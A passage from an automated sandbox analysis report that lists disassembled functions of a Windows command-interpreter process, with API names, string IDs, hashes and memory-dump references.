                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: [%s]
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 886762496-302437576
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ce8a27e920f572e404f41a904e0e9e1f32ad4afac90b3a855897b1604137cddc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69315936715B8685EB21EF21EC603EAA7A0FF89B88F844135DA8D4BB55DF3CD2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC32E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC33A8: iswspace.MSVCRT(?,?,00000000,00007FF706EDD6EE,?,?,?,00007FF706ED0632), ref: 00007FF706EC33C0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(?,?,?,00007FF706EC32A4), ref: 00007FF706EC331C
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: off
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2389812497-733764931
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 46fdcb550e6f405988ca31f978f9db27044d08a16875aeef1306f421bca5f54b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93212A21E0C75281FA60BB19AD7927BF6A0FF45BA0F98C135D95E47685DF2CE8428221
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$DPATH$PATH
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3731854180-3148396303
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: acf12756a4032cce538779d70275ad7b40bebf8ba85dcc7de6ce343f80ce3ea9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28219A2AF09752C0EA54BB55EC6027BA3A0BF84B84FC88136DE0E473D6DF2CE4418360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC8198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: *.*$????????.???
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3392835482-3870530610
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5f20ee05c444da9cd093de5041372b282804257a6873221e1eb1bf641a78b2fc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB11C225B24B6281E768AB2ABD6053BB7E0FF44B90F985031DE8D47B85DF3DE4428710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED9114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: fprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 383729395-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e52f736ae07080ac365bcda8716230e3f734a8e571abd3b9f1c5d404f012c157
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3411A32190874291EA55AB14ED201BBA375FF547F4FC94331DA7D432D5EF2CE44A8350
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC09F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 287713880-1183017076
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0719d8efa997ac2aa8da3baf48a6714b4f87e82eb11e79c477ab1353f9571166
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33F04F31A18B52D5EA60AB01AC2017BE6A0FF88F54FC99131D95E43394EF2DE442C620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC04F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-2530943252
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7573600996a1f46c9666920c59a1aead382a64cbeb0534c9c6ce992817946474
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77011A25E09B02C6EA54AB11AC7113AB2A0FF55734FD40375C53E023E0EF3C65818320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED73C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-919018592
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e75eedab63912fb5927ba69ffd1c47ecd04edfe0393c67e9456e083bcfcca34d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12F01729A18B81D2EA00AB12FC5407AFA60FF89B94B889534DA4E03B58CF3CD4958B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB1130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1403193329-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e0dcf7d55acbfd2b97582650fc50cd5e5f6786588402c547e340b79fd2cdae78
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F461AF32A08B828AEB20EB659C602EEB7A4FF84768F945235DE5D07799DF38D451C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmp$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3270668897-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4004cc29e43533692e60ffeebda4eb169f8b08fddfb5043e6b64b16420e49f1f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C516E15E0875281EB61BF219D301BBA7A1FF85BA0FD89131CA5E072D6DF2CE9428370
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDF358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3442494845-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d11bcac15fab6a18b2e7a72af0edaa37a4a80aea7b5e0f5789bf03a59a7560d5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF31B032615BC68AEB60DF20ED503EAB7A4FB88B88F844135DA4E47B54CF38D245C710
